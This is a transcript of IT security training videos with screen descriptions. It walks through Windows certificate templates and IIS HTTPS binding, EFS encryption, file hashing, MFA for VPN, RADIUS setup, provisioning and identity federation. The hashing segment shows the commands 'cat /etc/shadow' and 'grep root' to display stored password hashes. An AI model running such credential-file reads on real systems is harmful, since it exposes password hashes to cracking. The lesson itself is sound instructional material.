requesting a user certificate maybe to digitally sign an encrypt e-mail, you would have to know some details –
things like the user e-mail address and so on. So we now know that we have a valid name that is responding on
the network.
So, at this point, let's go to the Start menu here on our server and type cert – c-e-r-t. We're going to start the
Certification Authority tool because this server already has a CA configured. Now, in the Certification
Authority tool [The certsrv window opens. The window is divided into two sections. The section on the left
contains the fakedomain-SRV2012-1-CA node, which further includes the Revoked Certificates and Certificate
Templates folders. The section on the right displays the content of the folder selected in the left section.] on the
left, I'm going to expand the name of my CA and I'm going to choose Certificate Templates. [The contents of
the Certificate Templated folder are displayed in the section on the right. It displays a list of templates and
their intended purposes.] Now we don't have a web server template here from which we can issue PKI
certificates.
So, to do that, I'm going to right-click on Certificate Templates on the left and choose Manage, which opens up
a new tool called the Certificate Templates Console. [This window is divided into three sections. The section in
the left contains the Certificate Templates node, which is selected by default. A list of generic templates is
displayed in the middle section. The section on the right is titled Actions.] Now, in this list, we've got a bunch
of generic templates, one of which in the Ws is called Web Server. So I want to right-click on that one and
choose Duplicate Template. [The Properties of New Template dialog box opens. It includes the General,
Subject Name, Cryptography, and Security tabs. At the bottom of the dialog box are several buttons such as
OK and Cancel.]
And, under the General tab, I'm going to give this a new name. It's going to be called Custom Web Server
Template. [He enters this name in the Template display name text box.] Now this is going to be the generated
PKI certificate of course. Down below, there are many other things that I can configure such as the Validity
period of the certificate. Here it's set to 2 years, which is fine. Under Subject Name here – in this case, the
name of the server that will receive the certificate – it's set to Supply in the request.
So that means that when we request the certificate, we'll have to supply the name. There are many other things
we could do here. For instance, under Cryptography, I might set the Minimum key size because remember
when a PKI certificate gets issued, there is a mathematically related public and private key pair.
So I'm going to go into the Security tab where I'm going to click the Add button. [The Select Users,
Computers, Service Accounts, or Groups dialog box opens. It includes the Object Types and Check Names
buttons.] And, for Object types, [He clicks the Object Types button and the Object Types dialog box opens. It
includes the Computers checkbox.] I'll select Computers. I'll click OK. Then I'm going to type in the name of
the server that I want to be able to have privileges to request a certificate from these templates. So that server is
called srv2012-1. [He enters this name in the Enter the object names to select text box under the Select Users,
Computers, Service Accounts, or Groups dialog box] I'll check the name and OK it. And, having that name
selected here in the ACL for this template, I'm going to make sure I turn on Enroll under the Allow
column. [He selects the Allow checkbox for the Enroll permission under the Permissions for SRV2012-1
section of the Security tabbed page.]
So SRV2012-1 is allowed to Enroll and essentially ask for a certificate based on this template. I'll click OK.
And I'll Close the Certificate Templates Console. [He switches back to the certsrv window.] Now the thing is
our Custom Web Server Template isn't showing up on the right, and that's normal. What you need to do to
make it usable is you need to right-click on Certificate Templates on the left. You need to go to New -
Certificate Template to Issue and then choose it from this list. There it is – Custom Web Server Template. We
are good to go.
Now let's play the part of the server that will request a certificate based on that template, which usually would
be a different computer. But, in our example, we'll just use the same computer. It won't make a difference. So
we're going to go ahead and go to the Start menu and type mmc.exe to start the Microsoft Management
Console tool. [The Console1 window opens. It is divided into three sections. The section in the left contains the
Console Root folder. The section in the middle displays the content of the folder selected in the section on the
left. The section on the right is titled Actions.] Now what I'm going to do here is add the certificate snap-in, so
we can work with certificates on this computer.
To make that happen, I'm going to go to the File menu. I'm going to choose Add/Remove Snap-in. [The Add
or Remove Snap-ins dialog box opens. It includes two list boxes. The first list box displays a list of available
snap-ins. The second list box displays a list of selected snap-ins. There is an Add button in the middle of these
list boxes that adds the selected snap-in from the first list box to the second list box.] I'm going to choose
Certificates on the left. Then I'll click Add in the middle. [A wizard opens. The first page is titled Certificates
snap-in. It contains a section, which is titled This snap-in will always manage certificates for. This section
includes the Computer account radio button. At the bottom are three buttons: Back, Next, and Cancel.] And
I'll choose Computer account, Next. [The next page is titled Select Computer. It includes a section that is titled
This snap-in will always manage. It further includes the Local computer radio button.] I'll leave it on Local
computer. And I'll click Finish. Finally, I'll click OK [in the Add or Remove Snap-ins dialog box] . And now
you can see that we've got the Certificates tool available or added to MMC. [The Certificates (Local
Computer) node gets added under the Console Root folder in the left section of the Console1 window.] So we
can now work with certificates for this computer.
In the left-hand navigator, [The Certificates (Local Computer) node further includes folders such as Personal
and Enterprise Trust.] I'm going to expand Personal, then I'm going to click Certificates where on the right, I
will see any existing certificates issued to this host. [The content of the Certificates subfolder is displayed in
the middle section.] To request a new certificate in the left-hand navigator, I will right-click on Certificates
and choose All Tasks - Request New Certificate. On the Certificate Enrollment screen – which is a wizard – I'll
click Next and Next again. And here we can see we can choose our Custom Web Server Template, [He selects
the Custom Web Server Template checkbox in the Request Certificates page.] but it says more information is
required.
So I'm going to click on that link. [The Certificate Properties dialog box opens, which includes the Subject
tab. It further includes the Subject name and Alternative name sections. Both sections contain a Type drop-
down list box and a Value text box. There are two buttons, Add and Remove, adjacent to both these
sections.] Now, for the Common name, I'm going to type in the name of my server – srv2012-1, [He types this
in the Value text box under the Subject name section.] and I will click Add. And, for the Alternative name
down below, I'll choose DNS [He selects this value in the Type drop-down list box.] and I'll put in srv2012-
1.fakedomain.local. [He types this in the Value text box.] Now we ping that at the onset of this demonstration
to make sure it was valid, and it was. I'll click Add. So essentially, this is going to be added into the PKI
certificate that gets issued for this server. So I'll click OK, and then I'll click the Enroll button. [This button is
present at the bottom of the Request Certificates page of the Certificate Enrollment wizard.]
And now it says the STATUS: Succeeded. So therefore I'll click Finish. I can see that I've got a certificate now
in this list that's been issued to this server from the template. [This certificate appears in the middle section of
the Console1 window.] I can see the Expiration Date. I can see the Intended Purposes. And actually, I could
even double-click on that certificate where I might even go into Details to see things like what's the subject
name. There is the subject name – the name of the server. If I go further down, I can even see things like the
Subject Alternative Name is the DNS name of the server of course and so on. So let's actually use that
certificate. And this host happens also to be a web server. We're going to do it on the same computer again.
In my Start menu, I'm going to type iis so that I can start the Internet Information Services (IIS) Manager tool
to manage web sites. It also actually lets me manage FTP sites. [The Internet Information (IIS) Manager
window opens. There is a section on the left, which is titled Connections. It includes the Start page node,
which further includes the SRV2012-1 (FAKEDOMAIN\Administrator) subnode. This subnode includes the
Sites folder, which further includes the Default Web Site option.] But we're worried about our Default Web
Site here and securing it with HTTPS. So you need a certificate for that. Well, we've got a certificate.
I'm going to right-click on the Default Web Site and choose Edit Bindings. [The Site Bindings dialog box
opens. It includes the Add and Edit buttons.] Here you can see our web server has a Port 80 binding, but not a
Port 443 binding, which is normally used for secured connections over HTTPS. So I'm going to click the Add
button. [The Add Site Binding dialog box opens. It includes the Type and IP address drop-down list boxes. It
also includes the Port and Host name text boxes.] And, from the Type drop-down list, I'll choose
https. [Another drop-down list box appears, which is titled SSL certificate.] Notice it's selected Port 443.
Now I have to choose an SSL certificate. So I'm going to go down and choose the one that we just issued here.
Here is the server's common name – srv2012-1. And I will click OK and Close. Now, if I start my web browser
– so I'm going to start Internet Explorer – and if I try to connect to https://srv2012-1, in this
case, .fakedomain.local/, the full DNS name, it takes us right to it. So now our server has an encrypted
connection through the certificate that we requested from the Windows Certificate Authority.
[Topic title: Use Windows EFS File Encryption. The presenter is Dan Lachance.] In this video, I'll
demonstrate how to use Windows encrypting file system. Encrypting file system, or EFS, is built into the
Windows operating system. And it allows users to encrypt files and folders. So that user then must be
successfully authenticated before decryption can occur. So therefore, it's based on the user unlike BitLocker,
which is really tied to the machine. And it protects data at rest or data while the machine is turned off and the
disk volume is encrypted still.
So the first thing we should always do is get some kind of context. And what that means here is I'm going to
type whoami to see who I'm currently logged in as. [The presenter types this in the PowerShell window.] In
this case, I'm logged in as the administrator account in the domain called fakedomain. Now this is important
because any files that I encrypt will be encrypted with whoever I'm currently authenticated as. So now that we
know that information, let's go ahead and take a look at what we need to do to make EFS file encryption work.
I'm going to open up Windows Explorer where I'm going to take a look at a sample file on drive I. So let me
just go into the UserDataFiles folder - Projects. Now I could encrypt an entire folder, but here I'm just going to
choose a single file called Project_A. I'm going to right-click on that file and choose Properties. [The
Project_A Properties dialog box opens.] In the Properties, I'm going to go down under the Advanced
button [He clicks the Advanced button and the Advanced Attributes dialog box opens.] where I can see it's not
currently encrypted, because there is no checkmark for the option that says Encrypt contents to secure data.
Now interestingly from the command line, I could also use the cipher.exe tool. So I'll just put a /? after that to
work with EFS encryption here at the command line. [He executes the cipher.exe /? command in the
PowerShell window.] And that's definitely useful if you want to work with things in an automated fashion, if
you want to repeat actions on multiple machines. However, I'm going to Minimize that screen. We're going to
use the GUI here to encrypt this file with EFS. [He switches back to the Advanced Attributes dialog box and
selects the Encrypt contents to secure data checkbox.]
So really it's just a matter of going into the Properties, going into the Advanced button, and turning on this
checkmark to encrypt the contents. Now, when I click OK the second time, [He clicks the OK button in the
Project_A Properties dialog box and the Encryption Warning dialog box opens.] it asks if I would like to
Encrypt the file and its parent folder or just the file. Well, I'm going to choose Encrypt the file only, and then
I'll turn on checkmark to always encrypt only the file. And I'll click OK. Now what this means is that any new
files placed into this folder will not be automatically encrypted. So that's fine.
I'm going to go ahead and OK out of that. And notice that the color of the file has changed because it's now
encrypted. Now, to the user that encrypted it, everything is completely transparent other than the color
changing. If I would open up that file by double-clicking, it just opens up as per usual, whereas anyone else is
going to get an access denied message.
Do take note though, that if you are working on a project – for example – and you want other people to be able
to decrypt that same file, it is possible. So, for instance, if I right-click on the file and go under Properties and
then go down under Advanced and then click on Details, [He clicks the Details button in the Advanced
Attributes dialog box and the User Access to Project_A dialog box opens.] from here I could click Add to add
other people that should be able to decrypt the same file. [He clicks the Add button and the Encrypting File
System dialog box opens.]
Now, in order for me to do that, I have to make sure I have access to their certificates. Now certificates –
what's that about? Well, in the background, what encrypting file system is doing is using a PKI certificate
issued to the user for encryption. Now either you can control that yourself or if the user doesn't already have a
PKI certificate the first time they encrypt file, it will be auto-generated, which is what will have happened here.
Let's go take a look at that. So, to verify that this is true, I'm going to start the Microsoft Management Console
or MMC. And we're going to add the certificate snap-in and look at the user certificate. So, in my Start menu,
I'm going to type mmc.exe. There it is. So I'm going to click on it. [He opens the Console1 window.] And I'll
maximize it. And I'll go to File menu. I'll choose Add/Remove Snap-in. [The Add or Remove Snap-ins dialog
box opens. It includes two list boxes. The first list box displays a list of available snap-ins. The second list box
displays a list of selected snap-ins. There is an Add button in the middle of these list boxes that adds the
selected snap-in from the first list box to the second list box.] On the left, I'll choose Certificates. Then I'll
click Add. [The Certificates snap-in dialog box opens that contains a section named This snap-in will always
manage certificates for. This section includes the My user account radio button.] And I want it for the user
account. So I'll leave it on My user account, Finish, and OK.
Alright, finally, after all those steps in our console on the left, we can see certificates for the current user. So I
will expand that as well as expanding Personal. Then I'll click on Certificates on the left. [He selects the
Certificates subfolder in the left section of the Console1 window and its content is displayed in the middle
section.] Notice here, I've got a certificate issued to my user account, Administrator. Now, because I've got a
Certificate Authority installed, that was issued by my Certificate Authority in the Active Directory domain.
And notice that the Expiration Date is listed here. And notice, this is the key here, no pun intended – the
Intended Purposes for encrypting file system. So this certificate then is what is used to encrypt and decrypt
files based on this user account. So it's crucial that that be backed up.
Now the safety net in an Active Directory domain environment – should PKI certificates be corrupt or not
backed up and stations destroyed? Is that the domain administrator is by default an EFS recovery agent? And
you can configure other accounts as recovery agents in Group Policy. And what that means then is that the
EFS recovery agent can decrypt anyone's data if absolutely required. In this video, we learned how to use
Windows EFS file encryption.
[Topic title: Fingerprinting, Hashing. The presenter is Dan Lachance.] In this video, I'll talk about
fingerprinting and hashing. A hash is a short value that uniquely represents original data. Hashing uses one-
way functions that are not feasibly reversed without knowledge of the original data. Hashing is also an
efficient way of detecting modification, especially across the network between multiple nodes without having
to transmit all of the original data. Instead, hashes can be computed on different devices. And the hashes
themselves – which are much smaller potentially than the data they are based on – are what would be sent and
compared over the network.
Hashes are normally at least 128 bits long. And they are sometimes called message digests. We can compute a
hash of data and then compare that to an earlier hash of that data to detect if any changes have occurred. And
this is actually done quite often with forensic evidence gathering to ensure that prior to forensic experts
conducting analysis on seized information, we have a record of its original state.
Ways that hashing gets used include password hashing in the UNIX and Linux /etc/shadow file. Here, in
Linux, I'm going to type cat /etc/shadow. [The presenter executes this command in the root@kali command
prompt window.] In UNIX and Linux environments, the shadow file will have user account information along
with hashed passwords. Now I'm going to clear the screen and bring up that command again with the up arrow.
But I'm going to pipe it to grep, which is a line filter. And we're going to look for the root user account. [He
executes the cat /etc/shadow | grep root command.]
What you're going to notice here is in the second placeholder – here because the delimiter is a colon – here we
have a hashed version of the root password. Now you can't enter in the hash to authenticate as that user. That's
not going to work. However, there is an algorithm that's used upon logon where the password is fed through a
hashing algorithm. And, if it results with this unique hash, then the password is then correct.
Hashing is also often used for file integrity verification. We can also verify that downloaded Internet files
haven't been corrupted during download by doing a hash after we've downloaded it on our local machine and
comparing it to a hash published on a web site. For instance , the shasum command line tool can be used in
Mac OS X to ensure downloaded files have not been corrupted or tampered with. You'll learn how to perform
hashing in Linux and Windows in other demonstrations. Common hashing algorithms include MD5 – that's
message digest 5; RIPEMD; and the secure hashing algorithm family such as SHA1, SHA2, and SHA3. In this
video, we discussed fingerprinting and hashing.
[Video description begins] Topic title: File Hashing in Linux. The presenter is Dan Lachance. [Video
description ends]
In this video, I'll demonstrate how to perform file hashing in the Linux operating system. Hashing allows us to
run some kind of a computation on originating data to see if it's changed since the last time we ran that same
computation. Here, in Linux, I'm in my data directory where I'm going to type ls to list files. I can see I've got a
file here called log1.txt. So why don't we take a look at what's inside it using the cat command?
[Video description begins] The presenter executes the cat log1.txt command. [Video description ends]
So there's a single line of text that says, "This is sample data on line one." What I'm now going to do is use the
md5sum command, spacebar, then I'll put in the name of my file. And notice that I get the resultant hash.
[Video description begins] He executes the md5sum log1.txt command. [Video description ends]
Now what I could do is use output redirection to store this hashed information in a file. So, for instance, I'll use
the up arrow key to bring up that command. I'll use a greater than sign, which is my output redirection symbol.
And maybe in the current directory, I'm going to make a file called log1hash.
[Video description begins] He executes the md5sum log1.txt > log1hash command. [Video description ends]
Now, when I press Enter, I don't get the output on the screen anymore, but I do have a log1hash file. If I cat the
log1hash file to view the contents within it, then I'm going to see that I've got my hash information along with
the filename.
[Video description begins] He executes the cat log1hash command. [Video description ends]
So let's go ahead then and make a change to the contents within log1.txt. To do that, I will use the Fantasy VI
text editor, so vi log1.txt. Now, in here, I'm going to the end of the line, going to press Insert. And I'm going to
press Enter where I'll type "This is line two." I'll then press Esc so that I'm no longer in INSERT mode. Now
I'm in command mode, so things I type in don't become part of the file, they're interpreted as commands in the
VI editor. So I'm going to type :wq. And you'll see that showed up in the bottom-left where w means write –
write the changes to the file – and q means quit. So now I'm going to use my up arrow key back to the md5sum
command originally against log1.txt. Let's go ahead and run it. Now notice that this time
[Video description begins] He again executes the md5sum log1.txt command. [Video description ends]
if you look carefully at the resultant hash, it begins with c2d2. That of course is different than the original hash,
which began with 53d4. So the point is this, hashing lets us detect when a change has occurred – in this case, to
a file in the Linux filesystem. In this video, we learned how to work with file hashing in Linux.
Objectives
[Topic title: File Hashing in Windows. The presenter is Dan Lachance.] In this video, I'll demonstrate how to
work with file hashing in the Windows environment. Now why would we ever want to hash a file? What is the
purpose? The purpose is to simply detect if a change has occurred since we last ran the computation that
resulted in the hash. Now, in the Windows world, we can use third-party command line and GUI tools or what
I'm going to demonstrate here is using PowerShell with the built-in Get-FileHash cmdlet. But first let's start by
typing dir.
Here we've got a working file called Project1.txt. So let's just use notepad to open that up to see what's inside
it. [The presenter executes the notepad .\Project1.txt command and the Project1.txt - Notepad window
opens.] It's got one line of text that says "This is line one." Okay, so that's what we've got to work with. Now
what I'm going to do is I'm going to use the Get-FileHash cmdlet – so get-filehash. Now, unlike Linux of
course, PowerShell is not case sensitive. And I'll give it the name of the file I want to run a hash of. That would
be Project1.txt. [He executes the get-filehash .\Project1.txt command.] And we can see the unique SHA256
hash value that's been returned.
Now, much like I can in other environments – like in Linux shells – I can redirect output of that command to a
file for future reference, which is exactly what I want to do. I'm going to use the up arrow key to bring up that
command. And, at the end, I'm going to use the greater than symbol because that will take the screen output
and capture it and dump it into a file instead, which I'm going to call project1hash. [He executes the get-
filehash .\Project1.txt > project1hash command.]
So, if I were to run notepad now against the project1hash file, [He executes the notepad .\Project1hash
command and the project1hash - Notepad window opens.] then we would see – of course – it contains the
SHA256 algorithm listing along with the actual hash and the name and path of the file. Excellent. Notice that
the hash starts with 227AB28. So now what we're going to do is Close that up. And instead, we're going to use
notepad to open up the project1 file – that's the origin data. [He executes the notepad project1 command and
the Project1.txt - Notepad window opens.] And we're going to make a change.
Took it to other line, this says "This is line two." And I'm going to go ahead and Close and Save that. And
we're going to recompute the hash again. So, to do that...and actually we're simply going to use get-filehash,
and it's going to run against Project1.txt. [He again executes the get-filehash .\Project1.txt command.] Now we
can tell immediately that we have a different returned hash value because now our current returned hash begins
with 082AC where before it started with 227AB28.
So we can now safely say that indeed that file has changed since we last ran the hashing algorithm because we
have a different hash-resultant value. Now you can also use this when you download files from the Internet
because some web pages will publish a hash value. And, to make sure that you downloaded the right file and
that it has not been tampered with or corrupted, you can run a hashing tool like this one to make sure you get
the same hash posted on the web site. In this video, we learned how to run file hashes in Windows.
Objectives
[Topic title: Authentication. The presenter is Dan Lachance.] In this video, we'll discuss authentication.
Authentication is a core part of Identity and Access Management. And it really means proof of identity
whether we're talking about a user, a device, or an application. Authentication has multiple categories that can
be used such as something you know. That would include something like a username and a password or a PIN.
Another category for authentication is something you have. That would include things like a PKI certificate or
a hardware or software token or even a smart card. The third category is something you are for biometric
authentication. This will include things like fingerprints, voice recognition scans, or retinal scans. Multifactor
authentication is often referred to as MFA. It's a combination of at least two authentication categories. So, for
example, something you know like a PIN and something you have like your smart card. So together you can
use that information and that device for authentication.
Multifactor authentication does constitute at least two authentication categories, but the two items cannot be in
the same category. That would not constitute MFA. So, for example, username and password are two items,
but they are the same category. They're both something you know. So therefore, username and password are
not considered multifactor authentication.
With authentication, we need an identity store. So think of things like user accounts. Where are they stored? So
user accounts then might be stored in an LDAP-compliant database such as Microsoft Active Directory
Domain Services databases. We can also configure RADIUS authentication, which allows for a centralized
authentication provider.
Edge devices like network switches and VPN appliance will forward their authentication requests from their
clients to the RADIUS server. So, in other words, edge network devices like switches, VPN appliances,
wireless routers, they would not perform authentication, instead they forward it to the RADIUS server which
does the authentication.
Identity Federation is a centralized, trusted identity provider where we have a single copy of credentials. So
applications then themselves do not perform authentication, instead they forward authentication requests to the
identity provider. In turn, the identity provider then sends a digitally signed security token to the app after
successful authentication.
Security tokens can contain what are called claims about users or devices. A claim is basically an assertion
about a user or device such as a date of birth, a department a device resides in, and so on. Identity federation is
often used for Web Single Sign-on for internal or public cloud apps so that users don't have to keep re-entering
the same credentials as they access different applications.
Finally, authentication can also be context based. So, in addition – for example – to a smart card and a PIN, we
might look at the time of day to determine if someone is allowed to authenticate or their location, which could
be based on GPS tracking or the frequency of how often they authenticate or other behavioral characteristics.
In this video, we discussed authentication.
Objectives
[Topic title: Configure MultiFactor Authentication for VPN Clients. The presenter is Dan Lachance.] In this
video, I'll demonstrate how to configure VPN multifactor authentication. Multifactor authentication can be
required for VPN connectivity. Now, if you think about it, your VPN appliance is in some way exposed to the
public Internet to allow incoming VPN connections in the first place. So usually, we want more than just
standard username and password, which constitutes single-factor authentication.
Instead, what we're going to do here is configure multifactor authentication through the use of a smart card
where the user must have the smart card in their possession and they must know the PIN in order to
authenticate the VPN. Now, depending on your VPN solution, the specific steps will vary. We're going to do it
here in the Windows Server 2012 environment.
So, from the Start menu, I'm going to type network so that I can start the Network Policy Server tool. Now, if
you're using a Windows Server as a VPN device, then this is the software that will make it happen. Also, this is
where you configure your RADIUS server settings for centralized authentication because as we know, VPN
appliances themselves should never actually do the authentication locally, in case they get compromised.
So here in the Network Policy Server tool, [The Network Policy Server window is divided into two sections.
The left section contains the NPS (Local) node. It further includes the Policies subnode. This subnode includes
the Connection Request Policies folder. The section on the right displays the content of the folder selected in
the left section.] over on the left I'm going to expand Policies. And I'm going to go ahead and right-click after I
select Connection Request Policies. There I'm going to choose New. [The New Connection Request Policy
wizard opens. The first page is titled Specify Connection Request Policy Name and Connection Type. It
includes the Policy name text box and Type of network access server drop-down list box.] And I'm going to
call this Incoming VPN Smartcard. [He types this in the Policy name text box.] Now, down below for the Type
of network access server that this connection request policy will be used for, I'm going to choose Remote
Access Server(VPN-Dial up).
Even though my users aren't using dial-up modems, they're connecting over the Internet. And I'll click
Next. [The next page of the wizard is titled Specify Conditions. It includes the Add button.] Now here in the
Specify Conditions dialog box, I'm going to click the Add button. [The Select condition dialog box opens. It
includes the Tunnel Type option. There is the Add button at the bottom of the dialog box.] And, in this case,
notice I have got multiple criteria I can select, but I'm going to just choose the Tunnel Type. [He clicks the Add
button and the Tunnel Type dialog box opens. It includes the Common dial-up and VPN tunnel types section,
which further includes the Layer Two Tunneling Protocol (L2TP) checkbox.] I want to specifically say here
that I only accept connections here for Layer Two Tunneling Protocol (L2TP) assuming that's what my VPN
appliance is configured with because here I'm not actually configuring the VPN appliance, I'm just configuring
the requirement for multifactor authentication.
So I'm going to go ahead and click OK, and I'll click Next. [The Specify Connection Request Forwarding page
of the wizard opens. It includes the Authenticate requests on this server radio button.] Now, at the RADIUS
level, here I can determine whether authentication requests should be handled on this server, which is what I
want because this is actually my RADIUS server with Active Directory user accounts. But notice I do have the
option of forwarding requests to a different RADIUS server. Well, I would have the option if I had additional
servers. Right now it's currently grayed out.
So I'm going to go ahead and click Next on the screen. I didn't change anything. Now, on the Specify
Authentication Methods screen, this is where we're going to do the work to specify that VPN clients must use
multifactor authentication. [This page of the wizard includes the Override network policy authentication
settings checkbox.] So, to do that, I'm going to turn on the checkmark here for the option that says Override
network policy authentication settings because we're going to specify them here.
Now, under EAP Types, I'm going to click the Add button. EAP, of course, stands for Extensible
Authentication Protocol. [The Add EAP dialog box opens. It includes the Microsoft: Smart Card or other
certificate option.] And what I want to choose here is Microsoft: Smart Card or other certificate. So I'm going
to choose that and click OK. And then I'll proceed through the wizard by clicking Next. Now I don't need to
specify any other attributes. So I'll just continue through the wizard until I get to my summary screen where I
will click Finish.
[Now the content of the Connection Request Policies folder includes the Incoming VPN Smartcard policy. Its
status is Enabled and source is Remote Access Server(VPN-Dial up).] So now I've got a connection request
policy whereby it requires multifactor VPN authentication through the use of a smart card. Now this is going to
be used when we've got VPN appliances that forward RADIUS authentication requests to this device. In this
video, we learned how to configure VPN multifactor authentication.
[Topic title: Authorization. The presenter is Dan Lachance.] In this video, I'll talk about authorization.
Authorization occurs after successful authentication of a user, a device, or an application. Authorization allows
access to a resource such as a network, a web application, a file, a folder, a database, and so on. Access control
lists – or ACLs – control resource access. With authorization, it's important to adhere to the principle of least
privilege where permissions are granted – only those that are required to complete a job task and no more.
There also should be a periodic review of access privileges to ensure that they are still sufficient. Or, in some
cases, to ensure that too many permissions are now not the issue. Examples of privileges would include things
like read, write, delete, the ability to modify attributes – for instance – of a file, or to insert a row in a database.
Windows NTFS standard file system permissions include full control, modify, read and execute, list folder
contents, read, write, and special permissions.
Now most of these are pretty self-explanatory. If you have full control, you can do anything you want to the
file. If you have read access, you can read the contents. However, modify and write are a little bit more of a
mystery. A big distinction between modify and write is that modify allows file deletion and write does not.
Special permissions give you a further degree of granularity. For instance, you might want to allow the
creation of folders in a certain location on a server, but not files. Now, if you use the standard permission set
such as the write permission, well that allows the creation of both folders and files. So special permissions lets
you get much more granular.
In Linux standard file system permissions include read, write, and execute. Now read has a value of four, write
has a value of two, and execute has a value of one. So, for example, for the owner of a file if she had all of
these permissions, then numerically that would be four plus two plus one which equals seven.
[Topic title: RADIUS, TACACS+. The presenter is Dan Lachance.] In this video, I'll demonstrate how to
configure a Windows RADIUS server. So a RADIUS server then is a centralized authentication host. And, to
make that happen on a Windows Server 2012 R2 machine, we need to make sure we have the Network Policy
Server role installed. So, here in PowerShell on my Windows computer, I'm going to run the get-
windowsfeature command and I'm going to pad the word policy with wildcard asterisk symbols. In other
words, to get a list of Windows features that contain the word policy. [The presenter executes the get-
windowsfeature *policy* command.]
And here we can clearly see in fact that the Network Policy Server role is installed because there is an [X] in
the box. So the next thing we will do then is start the Network Policy Server GUI tool to configure the
RADIUS server. So, from my Windows Start menu, I'm going to search for the word network. And, when the
Network Policy Server tool shows up, we would go ahead and click on it.
So this is the tool then that we use when we want to configure our Network Policy Server or specifically our
Windows RADIUS server. [The Network Policy Server window opens. The window is divided into two
sections. The left section includes the RADIUS Clients and Servers folder.] So, in the Network Policy Server
tool, the first thing I'm going to do over the left is expand the list of RADIUS Clients and Servers. Now the
idea here is I have to define one or more RADIUS Clients that will forward authentication requests to this
RADIUS server.
So, by virtue of this server having this software installed and being connected to Active Directory, it can act as
a RADIUS authentication server. So, in the left-hand navigator, I'm going to click on RADIUS Clients which
is underneath RADIUS Clients and Servers. [He selects the RADIUS Clients option under the RADIUS Clients
and Servers folder and its content is displayed in the section on the right.] And we see on the right that we
don't have any RADIUS Clients defined.
Now remember a RADIUS client is not the end user trying to connect to the network, for instance, through a
VPN, through an Ethernet switch, or through a wireless router. Instead the RADIUS client is the EdgePoint
network device like the VPN appliance or the wireless router or the Ethernet switch. So they have to be added
here so that they are known by the RADIUS server.
So we're going to right-click on RADIUS Clients and choose New. [The New RADIUS Client dialog box
opens. It includes the Name and Address section, which further includes the Friendly name and Address (IP or
DNS) text boxes. The dialog box also includes the Shared Secret section, which further includes the Shared
secret and Confirm shared secret text boxes.] And, for this first name, I'm going to call it VPN Appliance
1 [He types this in the Friendly name text box.] and I'm going to go ahead and pop in the IP address of my
VPN appliance. [He enters 200.2.35.6 in the Address (IP or DNS) text box.] Now, down below, I'm going to
manually put in a Shared secret that I have to configure on the VPN appliance. This is used for the VPN
appliance to authenticate to this RADIUS server.
So I'm going to go ahead and click OK. [As a result, the VPN Appliance 1 RADIUS Client gets added to the
content of the RADIUS Clients option.] Let's add another one. I'm going to right-click on RADIUS Clients on
the left-hand navigator again and choose New. This time I'm going to call this one wireless access point or
WAP 1. [He types this in the Friendly name text box.] And, in the same way, I'll put in the IP address. But
notice I could put in the actual DNS name of that host if it's configured. [He enters 200.34.67.4 in the Address
(IP or DNS) text box.] And, once again, I can configure either the same or a different Shared secret.
You'll notice that we can build a template where this stuff is just selectable from the list. [He points to the
Select an existing Shared Secrets template drop-down list box under the Shared Secret section.] So, if we
know we are going to configure dozens of VPN or wireless access point clients with the same Shared secret,
maybe it makes sense to build the template first. But here I've only got two. So I don't mind popping in the
same Shared secret. And I'll go ahead and click on OK. [As a result, the WAP 1 RADIUS Client gets added to
the content of the RADIUS Clients option.]
So, now at this point, we've actually got our Windows RADIUS server configured along with two VPN clients.
Now, if we didn't have the network policy role installed, we can either use the server manager GUI to do it. Or,
here in PowerShell...let's just search for PowerShell and fire it up instead of the get-windowsfeature cmdlet, we
would use the install-windowsfeature cmdlet followed by the name of the specific component that we wish to
install.
And remember, if you are not sure about what the nomenclature is for this stuff, just go ahead and search for
like this – so get-windowfeature. Again I'm going to search for the word policy. I'm just guessing – it's
Network Policy Server. And of course you need to spell things correctly. It's get-windowsfeature, not
window. [He executes the get-windowsfeature *policy* command. The output is displayed in a tabular
form.] We can see that it's called over here under the name column NPAS-Policy-Server. So that's what we
would use with the install-windowsfeature cmdlet if we needed to install the software if it's not already there.
Objectives
[Topic title: User Provisioning and Deprovisioning. The presenter is Dan Lachance.] In most cases, accessing
a network resource requires a user account. In this video, we'll talk about user provisioning and
deprovisioning. Provisioning would be used for newly hired employees where there is a standard onboarding
process for those new hires, which would include reviewing and signing of acceptable use policies, user
awareness and training about security issues, how to conduct themselves in the corporate environment, and so
on.
Deprovisioning would involve activities such as conducting an exit interview or removing access. For
example, disabling a user account once they've left the company versus deleting their user account. We might
do that so we can still track what they did or take a look at any work they were working on. Or, in some cases,
even decrypt things that were decrypted with their user account.
Another way to remove access with user deprovisioning is to revoke an associated PKI certificate or
certificates issued to the user and/or devices that they used. For instance, if a user was issued a company
smartphone that could connect to the VPN, that smartphone might use a PKI certificate to authenticate the
VPN. Well, if that certificate is revoked, it can't connect to the VPN anymore.
Common tasks with user provisioning and management overall down to deprovisioning include the creation of
the user account, the modification of the user account while it's in use, for instance, changing attributes such as
last name if somebody gets married or changing a password if it's forgotten. There is the disabling of a user
account. This might be done, for instance, if a user is on sick leave or parental leave. And finally of course
there is user account deletion.
Data from other human resource apps can also be used or integrated with a current solution that might be used.
For instance, we might link Active Directory user accounts with the PeopleSoft application. With user account
creation, users are normally then added to groups after they have an account. Now this is based on their
required access to resources to complete job-specific tasks.
Password policies are also a part of user provisioning, although this is normally automated. For instance, in an
Active Directory environment, we would have a domain Group Policy object that applies to everybody in the
domain so that we have the same password policy in effect. So it would include things like the minimum and
maximum password ages, a minimum password length, password complexity, and so on.
Now, that's not to say that in an Active Directory environment, you can't have password settings for different
groups of users. You can, just not through Group Policy, instead you would configure fine-grained password
policies. In some cases, it's appropriate to use self-service user provisioning where users can request an
account and they can set their own password.
An example of this that we've all come across at some point I'm sure is using a web site that requires a user
account before you can participate in the web site. So, in some cases, you will be able to create a free account
where you can also set your own password. So that's an example of self-service user provisioning.
[Topic title: Identity Federation. The presenter is Dan Lachance.] In this video, we'll talk about identity
federation. Identity federation is related to identity management where we have a centralized identity provider.
This removes the need for redundant user account information. And it also gets configured to trust relying
entities. A relying entity, for example, might be a web application server that we will authenticate user access
to.
Resources are configured to trust the identity provider. And, again, that's an example of a relying entity such as
a web application. So this is often also called a relying party. And normally what's done is the public key from
a certificate or key pair used by the identity provider is made available to the relying party.
Applications don't perform authentication, instead they forward the authentication requests from users to the
trusted identity provider for which they now have a public key. So the identity provider then sends a digitally
signed security token to the app after successful authentication for the user or device.
Now the identity provider's private key creates the signature. Apps have the public key that's related so they
can verify the signature for authenticity. Identity providers generate security tokens. This is often referred to
the specific component on the identity server as a Security Token Service or STS. Security tokens can contain
claims about users or devices.
